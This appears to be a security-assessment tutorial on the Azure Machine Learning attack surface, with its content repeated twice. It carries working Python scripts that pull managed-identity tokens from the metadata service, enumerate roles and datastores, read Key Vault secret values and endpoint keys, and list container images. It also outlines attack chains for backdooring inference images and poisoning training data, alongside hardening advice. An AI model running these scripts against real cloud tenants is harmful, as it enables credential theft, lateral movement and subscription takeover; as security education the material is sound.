Azure ML Attack Surface

advanced13 min readUpdated 2026-03-13

Security assessment of Azure Machine Learning -- managed identity exploitation, workspace security, compute instance attacks, and endpoint vulnerabilities.

azure azure-ml cloud ml-platform

Azure ML Architecture

Azure Machine Learning organizes resources around workspaces. Each workspace connects to Azure storage, Key Vault, Container Registry, and Application Insights.

Attack Surface Map

Component	Identity	Storage	Network Exposure
Compute Instances	Managed Identity/User	Workspace storage	VNet optional
Online Endpoints	Managed Identity	Model in ACR/Blob	Internet-facing
Batch Endpoints	Managed Identity	Blob input/output	VNet optional
Datastores	Workspace MI	Blob/ADLS/SQL	Workspace VNet
Pipelines	Pipeline MI	Blob artifacts	Workspace VNet

Azure ML compute instances are assigned managed identities (system-assigned or user-assigned) that authenticate to Azure services without storing credentials. When these identities are overprivileged -- a common misconfiguration since ML workflows touch many services -- compromising a compute instance grants broad access across the Azure subscription.

The Instance Metadata Service (IMDS) at 169.254.169.254 is the primary token source. Unlike AWS IMDSv2, Azure IMDS does not require a PUT-based token exchange, making credential harvesting straightforward from any code running on the instance.

import requests
 
# From inside an Azure ML compute instance
# Get token for the managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
    "api-version": "2018-02-01",
    "resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
 
resp = requests.get(token_url, params=params, headers=headers)
token = resp.json()["access_token"]
 
# Use the token to enumerate Azure resources
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {token}"}).json()
for sub in subs.get("value", []):
    print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")

Lateral Movement via Managed Identity

Once you have a token, enumerate what the managed identity can reach. Common overprivilege patterns include Contributor-level access to the resource group (granting access to all sibling resources), Storage Blob Data Contributor on storage accounts containing non-ML data, and Key Vault Secrets Officer across multiple vaults.

import requests
 
def enumerate_role_assignments(token, subscription_id):
    """Enumerate all role assignments for the current identity."""
    url = (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Authorization/roleAssignments"
        f"?api-version=2022-04-01"
    )
    headers = {"Authorization": f"Bearer {token}"}
    resp = requests.get(url, headers=headers).json()
 
    for assignment in resp.get("value", []):
        props = assignment["properties"]
        print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
        print(f"  Scope: {props['scope']}")
        print(f"  Principal: {props['principalId']}")
        print()
 
def get_token_for_resource(resource_url):
    """Get a managed identity token scoped to a specific resource."""
    resp = requests.get(
        "http://169.254.169.254/metadata/identity/oauth2/token",
        params={"api-version": "2018-02-01", "resource": resource_url},
        headers={"Metadata": "true"}
    )
    return resp.json()["access_token"]
 
# Get tokens for different Azure services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")

2. Workspace Data Store Enumeration

Azure ML workspaces connect to multiple data stores -- Azure Blob Storage, Azure Data Lake Storage (ADLS Gen2), Azure SQL Database, and Azure Database for PostgreSQL. Each datastore registration stores connection details and credentials that can be extracted.

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# List all datastores
for ds in ml_client.datastores.list():
    print(f"Datastore: {ds.name} (type: {ds.type})")
    if hasattr(ds, 'account_name'):
        print(f"  Storage: {ds.account_name}/{ds.container_name}")
 
# List registered models
for model in ml_client.models.list():
    print(f"Model: {model.name} v{model.version}")

Deep Datastore Inspection

Beyond listing datastores, extract their connection credentials and probe what data is accessible. Datastores that use account keys (rather than managed identity passthrough) store those keys in the workspace's Key Vault.

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# Get detailed datastore info including credential type
for ds in ml_client.datastores.list():
    detail = ml_client.datastores.get(ds.name)
    print(f"\nDatastore: {detail.name}")
    print(f"  Type: {detail.type}")
 
    # Check credential type -- account_key vs identity-based
    if hasattr(detail, 'credentials'):
        cred_type = type(detail.credentials).__name__
        print(f"  Credential type: {cred_type}")
 
    # For blob datastores, try to list contents
    if detail.type == "azure_blob":
        from azure.storage.blob import BlobServiceClient
        blob_client = BlobServiceClient(
            f"https://{detail.account_name}.blob.core.windows.net",
            credential=DefaultAzureCredential()
        )
        container = blob_client.get_container_client(detail.container_name)
        print(f"  Sample contents:")
        for blob in container.list_blobs(results_per_page=5):
            print(f"    {blob.name} ({blob.size} bytes)")
 
# Enumerate environments (container images used for training/inference)
for env in ml_client.environments.list():
    print(f"Environment: {env.name} v{env.version}")
    if hasattr(env, 'image'):
        print(f"  Image: {env.image}")
 
# List compute targets -- potential pivot points
for compute in ml_client.compute.list():
    print(f"Compute: {compute.name} (type: {compute.type}, state: {compute.state})")

3. Endpoint Authentication Testing

Azure ML online endpoints support two authentication modes: key-based (a static API key) and Azure AD token-based. Misconfigurations include endpoints deployed with authentication disabled, keys that are never rotated, or overly broad CORS policies.

import requests
 
# Test if endpoint requires authentication
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"
 
# Attempt unauthenticated access
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")
 
# Attempt with a stolen/guessed key
resp = requests.post(
    endpoint_url,
    json={"data": [[1,2,3]]},
    headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")

Advanced Endpoint Probing

import requests
import json
 
def probe_endpoint(endpoint_url, keys=None):
    """Comprehensive endpoint security assessment."""
    results = {}
 
    # Test authentication modes
    results["no_auth"] = requests.post(
        endpoint_url, json={"data": [[1,2,3]]}
    ).status_code
 
    # Test with OPTIONS to check CORS
    results["cors"] = requests.options(endpoint_url).headers.get(
        "Access-Control-Allow-Origin", "not set"
    )
 
    # Test Swagger/OpenAPI endpoint (often exposed)
    swagger_url = endpoint_url.replace("/score", "/swagger.json")
    swagger_resp = requests.get(swagger_url)
    results["swagger_exposed"] = swagger_resp.status_code == 200
    if results["swagger_exposed"]:
        results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
 
    # Test health endpoint
    health_url = endpoint_url.replace("/score", "/")
    results["health"] = requests.get(health_url).status_code
 
    # Test for verbose error messages (information disclosure)
    malformed_resp = requests.post(
        endpoint_url,
        data="not json",
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {keys[0]}" if keys else ""}
    )
    results["error_verbosity"] = len(malformed_resp.text)
    results["error_sample"] = malformed_resp.text[:500]
 
    return results
 
# Enumerate all endpoints and probe each
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
for endpoint in ml_client.online_endpoints.list():
    print(f"\n=== Endpoint: {endpoint.name} ===")
    print(f"  Auth mode: {endpoint.auth_mode}")
    print(f"  Scoring URI: {endpoint.scoring_uri}")
 
    # Get endpoint keys if key-based auth
    if endpoint.auth_mode == "key":
        keys = ml_client.online_endpoints.get_keys(endpoint.name)
        print(f"  Primary key: {keys.primary_key[:10]}...")
        print(f"  Secondary key: {keys.secondary_key[:10]}...")

4. Key Vault Secret Extraction

Every Azure ML workspace creates an associated Azure Key Vault. This vault stores datastore credentials, API keys, custom secrets set by data scientists, and connection strings. The workspace's managed identity typically has broad access to this vault, making it a high-value target after initial compute compromise.

from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
 
# Azure ML workspaces have an associated Key Vault
kv_client = SecretClient(
    vault_url="https://my-workspace-kv.vault.azure.net/",
    credential=DefaultAzureCredential()
)
 
# List and read secrets
for secret in kv_client.list_properties_of_secrets():
    print(f"Secret: {secret.name}")
    value = kv_client.get_secret(secret.name)
    print(f"  Value: {value.value[:50]}...")

Comprehensive Key Vault Enumeration

from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
 
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
 
# Enumerate secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
    print(f"  {secret.name} (enabled: {secret.enabled}, "
          f"created: {secret.created_on})")
    # Categorize by naming convention
    if any(kw in secret.name.lower() for kw in
           ['connection', 'storage', 'sql', 'password', 'key', 'token']):
        print(f"    [HIGH VALUE] Likely credential or connection string")
 
# Enumerate keys (used for encryption, signing)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key in key_client.list_properties_of_keys():
    print(f"  {key.name} (type: {key.key_type}, ops: {key.allowed_operations})")
 
# Enumerate certificates
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
    print(f"  {cert.name} (expires: {cert.expires_on})")

5. Container Registry Exploitation

Azure ML workspaces use Azure Container Registry (ACR) to store Docker images for training and inference environments. Compromising ACR access enables model supply chain attacks -- replacing legitimate inference images with backdoored versions.

import requests
 
def enumerate_acr(acr_name, token):
    """Enumerate repositories and images in Azure Container Registry."""
    acr_url = f"https://{acr_name}.azurecr.io"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Get ACR-specific token using managed identity
    exchange_url = f"{acr_url}/oauth2/exchange"
    acr_token_resp = requests.post(exchange_url, data={
        "grant_type": "access_token",
        "service": f"{acr_name}.azurecr.io",
        "access_token": token
    })
    acr_token = acr_token_resp.json().get("refresh_token")
 
    # List repositories
    repos = requests.get(
        f"{acr_url}/v2/_catalog",
        headers={"Authorization": f"Bearer {acr_token}"}
    ).json()
 
    for repo in repos.get("repositories", []):
        print(f"Repository: {repo}")
        # List tags
        tags = requests.get(
            f"{acr_url}/v2/{repo}/tags/list",
            headers={"Authorization": f"Bearer {acr_token}"}
        ).json()
        for tag in tags.get("tags", [])[:5]:
            print(f"  Tag: {tag}")
            # Get manifest for image analysis
            manifest = requests.get(
                f"{acr_url}/v2/{repo}/manifests/{tag}",
                headers={
                    "Authorization": f"Bearer {acr_token}",
                    "Accept": "application/vnd.docker.distribution.manifest.v2+json"
                }
            ).json()
            print(f"  Layers: {len(manifest.get('layers', []))}")

6. Network Isolation Assessment

Azure ML supports VNet integration, but many deployments use the default configuration without network isolation. Even when VNet integration is enabled, misconfigured network security groups (NSGs) and missing private endpoints create attack paths.

import requests
 
def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
    """Assess whether an Azure ML workspace has proper network isolation."""
    base_url = "https://management.azure.com"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Get workspace details
    ws_url = (
        f"{base_url}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.MachineLearningServices"
        f"/workspaces/{workspace_name}"
        f"?api-version=2023-10-01"
    )
    ws = requests.get(ws_url, headers=headers).json()
 
    props = ws.get("properties", {})
    results = {
        "public_network_access": props.get("publicNetworkAccess", "Unknown"),
        "private_endpoints": [],
        "managed_network": props.get("managedNetwork", {}),
    }
 
    # Check for private endpoint connections
    pe_connections = props.get("privateEndpointConnections", [])
    for pe in pe_connections:
        pe_props = pe.get("properties", {})
        results["private_endpoints"].append({
            "name": pe.get("name"),
            "status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
        })
 
    # Assess risk
    if results["public_network_access"] == "Enabled":
        print("[CRITICAL] Public network access is enabled")
    if not results["private_endpoints"]:
        print("[HIGH] No private endpoints configured")
 
    return results

Defensive Assessment Checklist

When assessing Azure ML security posture, verify these controls:

Control Area	What to Check	MITRE ATLAS Reference
Identity	Managed identity scope, conditional access policies, RBAC assignments	AML.T0003 (ML Model Access)
Network	VNet integration, private endpoints, NSG rules, public endpoint exposure	AML.T0002 (Active Scanning)
Data	Storage encryption, datastore credential type, blob public access	AML.T0008 (Collection)
Compute	Instance isolation, SSH access, idle shutdown, patching	AML.T0004 (Full Model Access)
Registry	ACR access controls, image signing, vulnerability scanning	AML.T0018 (Backdoor ML Model)
Secrets	Key Vault access policies, secret rotation, soft-delete enabled	AML.TA0008 (Collection)
Monitoring	Diagnostic settings, Azure Sentinel integration, audit logs	AML.TA0006 (Defense Evasion)

Recommended Hardening

Use user-assigned managed identities with least-privilege RBAC instead of system-assigned identities with broad scope.
Enable VNet integration with private endpoints for the workspace, storage accounts, Key Vault, and ACR.
Set publicNetworkAccess to Disabled on all workspace resources.
Use credential passthrough for datastores instead of storing account keys in Key Vault.
Enable ACR content trust and scan images for vulnerabilities before deployment.
Enforce auth_mode: aad_token on endpoints rather than key-based authentication.
Enable Azure Sentinel with the ML workspace diagnostic settings for security monitoring.
Rotate endpoint keys on a regular schedule and after any suspected compromise.

Common Attack Chains

Real-world Azure ML engagements typically combine multiple techniques. Here are common attack chains ordered by impact:

Chain 1: Compute to Subscription Takeover

1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentials

Chain 2: Model Supply Chain Attack

1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates inference data to attacker C2

Chain 3: Training Pipeline Manipulation

1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpoint

MITRE ATLAS Mapping for Azure ML Attacks

Attack Technique	ATLAS ID	Azure ML-Specific Context
IMDS managed identity token extraction	AML.TA0002 (Initial Access)	Workspace MI with broad RBAC scope
Datastore enumeration	AML.T0000 (Search for Victim's Data)	Registered datastores reveal all connected storage
Endpoint probing	AML.T0002 (Active Scanning)	Endpoints may use key-based auth without rotation
Model extraction via endpoint	AML.T0024 (Model Extraction)	Online endpoints serving model predictions
ACR image tampering	AML.T0018 (Backdoor ML Model)	Replace training/inference images in ACR
Key Vault lateral movement	AML.TA0008 (Collection)	Workspace Key Vault stores cross-service secrets
Training data poisoning via blob	AML.T0020 (Data Poisoning)	Modify training data in connected blob storage

Cross-Platform Comparison

Attack Vector	Azure ML	AWS SageMaker	GCP Vertex AI
Credential source	IMDS (managed identity)	IMDS (IAM role)	Metadata server (SA token)
Primary storage	Blob Storage / ADLS	S3	GCS
Container registry	Azure Container Registry	Amazon ECR	Artifact Registry
Secret management	Key Vault (auto-created)	Secrets Manager / SSM	Secret Manager
Network isolation	VNet + Private Endpoints	VPC + VPC Endpoints	VPC-SC + Private Google Access
Biggest risk	Key Vault cross-service exposure	IAM role overprivilege	Service account `Editor` role

Cloud AI Infrastructure -- Cross-platform overview
GCP Vertex AI -- GCP comparison
AWS SageMaker -- AWS comparison

References

Azure Machine Learning Security Baseline - Microsoft (2024) - Official security configuration guidance
"Securing Azure Machine Learning Workspaces" - Microsoft Learn (2024) - Workspace isolation and access control
"Managed Identity Best Practices" - Microsoft (2024) - Guidance on limiting managed identity scope
"Azure Security Benchmark v3" - Microsoft (2023) - Cross-service security controls applicable to Azure ML

Knowledge Check

What makes Azure ML's Key Vault integration a significant attack surface?

Edit this page on GitHub

Azure ML Attack Surface

advanced13 min readUpdated 2026-03-13

Security assessment of Azure Machine Learning -- managed identity exploitation, workspace security, compute instance attacks, and endpoint vulnerabilities.

azure azure-ml cloud ml-platform

Azure ML Architecture

Azure Machine Learning organizes resources around workspaces. Each workspace connects to Azure storage, Key Vault, Container Registry, and Application Insights.

Attack Surface Map

Component	Identity	Storage	Network Exposure
Compute Instances	Managed Identity/User	Workspace storage	VNet optional
Online Endpoints	Managed Identity	Model in ACR/Blob	Internet-facing
Batch Endpoints	Managed Identity	Blob input/output	VNet optional
Datastores	Workspace MI	Blob/ADLS/SQL	Workspace VNet
Pipelines	Pipeline MI	Blob artifacts	Workspace VNet

Attack Techniques

1. Managed Identity Exploitation

import requests
 
# From inside an Azure ML compute instance
# Get token for the managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
    "api-version": "2018-02-01",
    "resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
 
resp = requests.get(token_url, params=params, headers=headers)
token = resp.json()["access_token"]
 
# Use the token to enumerate Azure resources
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {token}"}).json()
for sub in subs.get("value", []):
    print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")

Lateral Movement via Managed Identity

import requests
 
def enumerate_role_assignments(token, subscription_id):
    """Enumerate all role assignments for the current identity."""
    url = (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Authorization/roleAssignments"
        f"?api-version=2022-04-01"
    )
    headers = {"Authorization": f"Bearer {token}"}
    resp = requests.get(url, headers=headers).json()
 
    for assignment in resp.get("value", []):
        props = assignment["properties"]
        print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
        print(f"  Scope: {props['scope']}")
        print(f"  Principal: {props['principalId']}")
        print()
 
def get_token_for_resource(resource_url):
    """Get a managed identity token scoped to a specific resource."""
    resp = requests.get(
        "http://169.254.169.254/metadata/identity/oauth2/token",
        params={"api-version": "2018-02-01", "resource": resource_url},
        headers={"Metadata": "true"}
    )
    return resp.json()["access_token"]
 
# Get tokens for different Azure services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")

2. Workspace Data Store Enumeration

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# List all datastores
for ds in ml_client.datastores.list():
    print(f"Datastore: {ds.name} (type: {ds.type})")
    if hasattr(ds, 'account_name'):
        print(f"  Storage: {ds.account_name}/{ds.container_name}")
 
# List registered models
for model in ml_client.models.list():
    print(f"Model: {model.name} v{model.version}")

Deep Datastore Inspection

from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
# Get detailed datastore info including credential type
for ds in ml_client.datastores.list():
    detail = ml_client.datastores.get(ds.name)
    print(f"\nDatastore: {detail.name}")
    print(f"  Type: {detail.type}")
 
    # Check credential type -- account_key vs identity-based
    if hasattr(detail, 'credentials'):
        cred_type = type(detail.credentials).__name__
        print(f"  Credential type: {cred_type}")
 
    # For blob datastores, try to list contents
    if detail.type == "azure_blob":
        from azure.storage.blob import BlobServiceClient
        blob_client = BlobServiceClient(
            f"https://{detail.account_name}.blob.core.windows.net",
            credential=DefaultAzureCredential()
        )
        container = blob_client.get_container_client(detail.container_name)
        print(f"  Sample contents:")
        for blob in container.list_blobs(results_per_page=5):
            print(f"    {blob.name} ({blob.size} bytes)")
 
# Enumerate environments (container images used for training/inference)
for env in ml_client.environments.list():
    print(f"Environment: {env.name} v{env.version}")
    if hasattr(env, 'image'):
        print(f"  Image: {env.image}")
 
# List compute targets -- potential pivot points
for compute in ml_client.compute.list():
    print(f"Compute: {compute.name} (type: {compute.type}, state: {compute.state})")

3. Endpoint Authentication Testing

import requests
 
# Test if endpoint requires authentication
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"
 
# Attempt unauthenticated access
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")
 
# Attempt with a stolen/guessed key
resp = requests.post(
    endpoint_url,
    json={"data": [[1,2,3]]},
    headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")

Advanced Endpoint Probing

import requests
import json
 
def probe_endpoint(endpoint_url, keys=None):
    """Comprehensive endpoint security assessment."""
    results = {}
 
    # Test authentication modes
    results["no_auth"] = requests.post(
        endpoint_url, json={"data": [[1,2,3]]}
    ).status_code
 
    # Test with OPTIONS to check CORS
    results["cors"] = requests.options(endpoint_url).headers.get(
        "Access-Control-Allow-Origin", "not set"
    )
 
    # Test Swagger/OpenAPI endpoint (often exposed)
    swagger_url = endpoint_url.replace("/score", "/swagger.json")
    swagger_resp = requests.get(swagger_url)
    results["swagger_exposed"] = swagger_resp.status_code == 200
    if results["swagger_exposed"]:
        results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
 
    # Test health endpoint
    health_url = endpoint_url.replace("/score", "/")
    results["health"] = requests.get(health_url).status_code
 
    # Test for verbose error messages (information disclosure)
    malformed_resp = requests.post(
        endpoint_url,
        data="not json",
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {keys[0]}" if keys else ""}
    )
    results["error_verbosity"] = len(malformed_resp.text)
    results["error_sample"] = malformed_resp.text[:500]
 
    return results
 
# Enumerate all endpoints and probe each
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
 
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="..."
)
 
for endpoint in ml_client.online_endpoints.list():
    print(f"\n=== Endpoint: {endpoint.name} ===")
    print(f"  Auth mode: {endpoint.auth_mode}")
    print(f"  Scoring URI: {endpoint.scoring_uri}")
 
    # Get endpoint keys if key-based auth
    if endpoint.auth_mode == "key":
        keys = ml_client.online_endpoints.get_keys(endpoint.name)
        print(f"  Primary key: {keys.primary_key[:10]}...")
        print(f"  Secondary key: {keys.secondary_key[:10]}...")

4. Key Vault Secret Extraction

from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
 
# Azure ML workspaces have an associated Key Vault
kv_client = SecretClient(
    vault_url="https://my-workspace-kv.vault.azure.net/",
    credential=DefaultAzureCredential()
)
 
# List and read secrets
for secret in kv_client.list_properties_of_secrets():
    print(f"Secret: {secret.name}")
    value = kv_client.get_secret(secret.name)
    print(f"  Value: {value.value[:50]}...")

Comprehensive Key Vault Enumeration

from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
 
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
 
# Enumerate secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
    print(f"  {secret.name} (enabled: {secret.enabled}, "
          f"created: {secret.created_on})")
    # Categorize by naming convention
    if any(kw in secret.name.lower() for kw in
           ['connection', 'storage', 'sql', 'password', 'key', 'token']):
        print(f"    [HIGH VALUE] Likely credential or connection string")
 
# Enumerate keys (used for encryption, signing)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key in key_client.list_properties_of_keys():
    print(f"  {key.name} (type: {key.key_type}, ops: {key.allowed_operations})")
 
# Enumerate certificates
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
    print(f"  {cert.name} (expires: {cert.expires_on})")

5. Container Registry Exploitation

import requests
 
def enumerate_acr(acr_name, token):
    """Enumerate repositories and images in Azure Container Registry."""
    acr_url = f"https://{acr_name}.azurecr.io"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Get ACR-specific token using managed identity
    exchange_url = f"{acr_url}/oauth2/exchange"
    acr_token_resp = requests.post(exchange_url, data={
        "grant_type": "access_token",
        "service": f"{acr_name}.azurecr.io",
        "access_token": token
    })
    acr_token = acr_token_resp.json().get("refresh_token")
 
    # List repositories
    repos = requests.get(
        f"{acr_url}/v2/_catalog",
        headers={"Authorization": f"Bearer {acr_token}"}
    ).json()
 
    for repo in repos.get("repositories", []):
        print(f"Repository: {repo}")
        # List tags
        tags = requests.get(
            f"{acr_url}/v2/{repo}/tags/list",
            headers={"Authorization": f"Bearer {acr_token}"}
        ).json()
        for tag in tags.get("tags", [])[:5]:
            print(f"  Tag: {tag}")
            # Get manifest for image analysis
            manifest = requests.get(
                f"{acr_url}/v2/{repo}/manifests/{tag}",
                headers={
                    "Authorization": f"Bearer {acr_token}",
                    "Accept": "application/vnd.docker.distribution.manifest.v2+json"
                }
            ).json()
            print(f"  Layers: {len(manifest.get('layers', []))}")

6. Network Isolation Assessment

import requests
 
def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
    """Assess whether an Azure ML workspace has proper network isolation."""
    base_url = "https://management.azure.com"
    headers = {"Authorization": f"Bearer {token}"}
 
    # Get workspace details
    ws_url = (
        f"{base_url}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.MachineLearningServices"
        f"/workspaces/{workspace_name}"
        f"?api-version=2023-10-01"
    )
    ws = requests.get(ws_url, headers=headers).json()
 
    props = ws.get("properties", {})
    results = {
        "public_network_access": props.get("publicNetworkAccess", "Unknown"),
        "private_endpoints": [],
        "managed_network": props.get("managedNetwork", {}),
    }
 
    # Check for private endpoint connections
    pe_connections = props.get("privateEndpointConnections", [])
    for pe in pe_connections:
        pe_props = pe.get("properties", {})
        results["private_endpoints"].append({
            "name": pe.get("name"),
            "status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
        })
 
    # Assess risk
    if results["public_network_access"] == "Enabled":
        print("[CRITICAL] Public network access is enabled")
    if not results["private_endpoints"]:
        print("[HIGH] No private endpoints configured")
 
    return results

Defensive Assessment Checklist

When assessing Azure ML security posture, verify these controls:

Control Area	What to Check	MITRE ATLAS Reference
Identity	Managed identity scope, conditional access policies, RBAC assignments	AML.T0003 (ML Model Access)
Network	VNet integration, private endpoints, NSG rules, public endpoint exposure	AML.T0002 (Active Scanning)
Data	Storage encryption, datastore credential type, blob public access	AML.T0008 (Collection)
Compute	Instance isolation, SSH access, idle shutdown, patching	AML.T0004 (Full Model Access)
Registry	ACR access controls, image signing, vulnerability scanning	AML.T0018 (Backdoor ML Model)
Secrets	Key Vault access policies, secret rotation, soft-delete enabled	AML.TA0008 (Collection)
Monitoring	Diagnostic settings, Azure Sentinel integration, audit logs	AML.TA0006 (Defense Evasion)

Recommended Hardening

Use user-assigned managed identities with least-privilege RBAC instead of system-assigned identities with broad scope.
Enable VNet integration with private endpoints for the workspace, storage accounts, Key Vault, and ACR.
Set publicNetworkAccess to Disabled on all workspace resources.
Use credential passthrough for datastores instead of storing account keys in Key Vault.
Enable ACR content trust and scan images for vulnerabilities before deployment.
Enforce auth_mode: aad_token on endpoints rather than key-based authentication.
Enable Azure Sentinel with the ML workspace diagnostic settings for security monitoring.
Rotate endpoint keys on a regular schedule and after any suspected compromise.

Common Attack Chains

Real-world Azure ML engagements typically combine multiple techniques. Here are common attack chains ordered by impact:

Chain 1: Compute to Subscription Takeover

1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentials

Chain 2: Model Supply Chain Attack

1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates inference data to attacker C2

Chain 3: Training Pipeline Manipulation

1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpoint

MITRE ATLAS Mapping for Azure ML Attacks

Attack Technique	ATLAS ID	Azure ML-Specific Context
IMDS managed identity token extraction	AML.TA0002 (Initial Access)	Workspace MI with broad RBAC scope
Datastore enumeration	AML.T0000 (Search for Victim's Data)	Registered datastores reveal all connected storage
Endpoint probing	AML.T0002 (Active Scanning)	Endpoints may use key-based auth without rotation
Model extraction via endpoint	AML.T0024 (Model Extraction)	Online endpoints serving model predictions
ACR image tampering	AML.T0018 (Backdoor ML Model)	Replace training/inference images in ACR
Key Vault lateral movement	AML.TA0008 (Collection)	Workspace Key Vault stores cross-service secrets
Training data poisoning via blob	AML.T0020 (Data Poisoning)	Modify training data in connected blob storage

Cross-Platform Comparison

Attack Vector	Azure ML	AWS SageMaker	GCP Vertex AI
Credential source	IMDS (managed identity)	IMDS (IAM role)	Metadata server (SA token)
Primary storage	Blob Storage / ADLS	S3	GCS
Container registry	Azure Container Registry	Amazon ECR	Artifact Registry
Secret management	Key Vault (auto-created)	Secrets Manager / SSM	Secret Manager
Network isolation	VNet + Private Endpoints	VPC + VPC Endpoints	VPC-SC + Private Google Access
Biggest risk	Key Vault cross-service exposure	IAM role overprivilege	Service account `Editor` role

Cloud AI Infrastructure -- Cross-platform overview
GCP Vertex AI -- GCP comparison
AWS SageMaker -- AWS comparison

References

Azure Machine Learning Security Baseline - Microsoft (2024) - Official security configuration guidance
"Securing Azure Machine Learning Workspaces" - Microsoft Learn (2024) - Workspace isolation and access control
"Managed Identity Best Practices" - Microsoft (2024) - Guidance on limiting managed identity scope
